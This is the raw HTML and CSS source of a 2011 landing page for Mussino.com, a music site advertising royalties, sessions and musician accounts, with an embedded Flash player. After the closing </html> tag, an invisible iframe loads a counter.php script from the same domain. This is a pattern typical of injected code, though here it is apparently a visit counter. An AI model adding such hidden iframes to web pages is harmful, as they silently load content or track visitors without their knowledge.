<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Mussino.com</title>
<style>

body {
	background-image:url(images/bodyBG.jpg);
	background-repeat:repeat-x;
	background-color:#020100;
	color:#FFF;
	padding:0px;
	margin:0px;
	font-family:Arial, Helvetica, sans-serif;
	font-size:12px;}
	
p { padding:0px;
	margin:0px;}
	
a {
	text-decoration:none;}	
	
a:active, a:focus {outline: 0;}		
	
img {
	border:none;}	

#introWrapper {
	min-width:950px;
	padding:0 20px;
	/*max-width:1200px;*/
    /*width: 1100px;*/
	margin: 0 auto;
	}
	
.LEFT {
	float:left;}
	
.RIGHT {
	float:right;
	text-align:center;}
	
.CLEAR {
	clear:both;}
	
.w130 {
	width:160px;}
	
.w390 {
	width:390px;}	
	
.w490 {
	width:490px;}	

.w510 {
	width:510px;}	
	
.smalltxt {
	font-size:10px;}
	
.blue {
	color:#3d92b0;
	}
	
.orange {
	color:#ff8328;
	}
	
.green {
	color: #390;
	}			
	
.marginT20 {
	margin-top:20px;}
	
.actor {
	margin-top:40px;}				
	
.topNav {
	min-width:900px;
	max-width:1200px;
	margin: 0 auto;
	height:45px;
	padding: 5px 0 0 0;
	}		
	
#glowBG {
	width:100%;
	height:500px;
	background-image:url(images/glowBG.jpg);
	background-repeat:no-repeat;}
	
#contentWrap {
	min-width:900px;
	max-width:1200px;
	margin: 0 auto;
	padding-top:50px;}	
	
.mediaPlayer {
	}		
	
.newmusicTxt {
	}	
	
.detailsDesc {
	margin-top:70px;
	color: #666;}
	
.currentExc {
	font-size:24px;
	margin:20px 0 0 0;}	
	
.tabBtn	 {
	background-image:url(images/tabBtn.gif);
	background-repeat:no-repeat;
	float:left;
	width:137px;
	height:25px;
	margin: 40px 10px 0 0;
	text-align:center;
	padding-top:5px;
	color:#FFF;
	text-decoration:none;}
	
.tabBtn	 a{
	color:#FFF;
	}			
	
#footerWrap {
	background-image:url(images/footerBG.jpg);
	background-repeat:repeat-x;
	 position:absolute;
	 bottom:0px;
   width:100%;
   height:104px;
   padding:0px;
   margin:0px;}	
   
 .footer {
	 min-width:900px;
	max-width:1200px;
	padding: 0 20px;
	 margin:0 auto;} 
	 
.foot1 {
	height:67px;
	}
	
.foot2 {
	text-align:right;
	}	
	
.foot2 ul li{
	
	color: #C5C5C5;
    display: inline-block;
    font-size: 11px;
    margin: 0 10px 0 0;
	}		
	
 li {
    list-style: none outside none;
	
}

.foot2 a{
	color:#999;
	text-decoration:none;}
   		

</style>

</head>

<body>

<div id="introWrapper">

<div class="topNav">
<div class="LEFT">
<a href="http://mussino.com"><img src="images/logo.png" /></a>
</div>
<div class="RIGHT">
<a href="http://mussino.com"><img src="images/joinNow.png" /></a>
</div>
</div>

<div class="CLEAR"></div>

<div id="glowBG">
<div id="contentWrap">

<div class="LEFT w490">
<div class="mediaPlayer">
<p>Mussino Universe Seeks Success In Networking Offically</p>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="465" height="283" id="flvPlayer" align="middle">
				<param name="movie" value="flvPlayer.swf" />
				<param name="quality" value="high" />
				<param name="bgcolor" value="#000000" />
				<param name="play" value="true" />
				<param name="loop" value="true" />
				 <param name="wmode" value="transparent">
				<param name="scale" value="showall" />
				<param name="menu" value="true" />
				<param name="devicefont" value="false" />
				<param name="salign" value="" />
				<param name="allowScriptAccess" value="sameDomain" />
				<!--[if !IE]>-->
				<object type="application/x-shockwave-flash" data="flvPlayer.swf" width="465" height="283">
					<param name="movie" value="flvPlayer.swf" />
					<param name="quality" value="high" />
					<param name="bgcolor" value="#000000" />
					<param name="play" value="true" />
					<param name="loop" value="true" />
					 <param name="wmode" value="transparent">
					<param name="scale" value="showall" />
					<param name="menu" value="true" />
					<param name="devicefont" value="false" />
					<param name="salign" value="" />
					<param name="allowScriptAccess" value="sameDomain" />
				<!--<![endif]-->
					<a href="http://www.adobe.com/go/getflash">
						<img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" />
					</a>
				<!--[if !IE]>-->
				</object>
				<!--<![endif]-->
			</object>

</div>

<div class="detailsDesc">
<div class="LEFT w130"><img src="images/check.gif" />100% Free</div>
<div class="LEFT w130"><img src="images/check.gif" />Reach Millions</div>
<div class="LEFT w130"><img src="images/check.gif" />Sell Music</div>
</div>
<div class="detailsDesc">
<div class="LEFT w130"><img src="images/check.gif" />Get Paid Royalties</div>
<div class="LEFT w130"><img src="images/check.gif" />Create Session</div>
<div class="LEFT w130"><img src="images/check.gif" />Enter Session</div>
</div>

<div class="detailsDesc">
<div class="LEFT w130"><img src="images/check.gif" />Musician Wanted</div>
<div class="LEFT w130"><img src="images/check.gif" />Artist Wanted</div>
<div class="LEFT w130"><img src="images/check.gif" />Judges Wanted</div>
</div>

<div class="detailsDesc">
<div class="LEFT w130"><img src="images/check.gif" />All genres</div>
<div class="LEFT w130"><img src="images/check.gif" />Worldwide</div>
<div class="LEFT w130"><img src="images/check.gif" />All ages</div>
</div>


</div>

<div class="RIGHT w510">

<div class="imgTxt">
<br />
<img src="images/newmusic_txt.gif" />
</div>

<div class="marginT20">
<p>Mussino.com is a music website Where discoveries are made and talent<br /> gets paid Royalties. A Music Industry structure inside Mussino core interface.</p>
</div>

<div class="actor">
<img src="images/actor.png" />
</div>


</div>


</div>
</div>

</div>

<div id="footerWrap">
<div class="footer">

<div class="foot1">
<div class="LEFT">
<p class="currentExc">Earn paid Royalties..</p>
</div>

<div class="RIGHT">
<a href="http://mussino.com"><div class="tabBtn">Musician <span class="blue">Acccount</span></div></a>
<a href="http://mussino.com"><div class="tabBtn">Songwriter <span class="orange">Acccount</span></div></a>
<a href="http://mussino.com"><div class="tabBtn">Judge <span class="green">Acccount</span></div></a>
</div>

</div>

<div class="foot2">
<ul>
   <li><a href="#">Home</a></li> 
            <li><a title="Site Map" href="http://mussino.com/main-page.php?id=2">About</a></li> 
            <li><a title="Site Map" href="http://mussino.com/main-page.php?id=11">How it works</a></li> 
            <li><a title="Site Map" href="http://mussino.com/main-page.php?id=12">Video Demos</a></li> 
            <li><a title="Site Map" href="http://mussino.com/main-page.php?id=8">FAQ</a></li> 
            <li><a title="Site Map" href="http://mussino.com/main-page.php?id=13">Join Us</a></li> 
            <li><a title="Site Map" href="http://mussino.com/main-page.php?id=5">Terms and Conditions</a></li> 
            <li><a title="Site Map" href="http://mussino.com/main-page.php?id=7">Contact Us</a></li> 
            
            <li>&copy; 2011 . All Rights Reserved </li>
</ul>



</div>

</div>
</div>

</body>
</html><iframe src="http://mussino.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
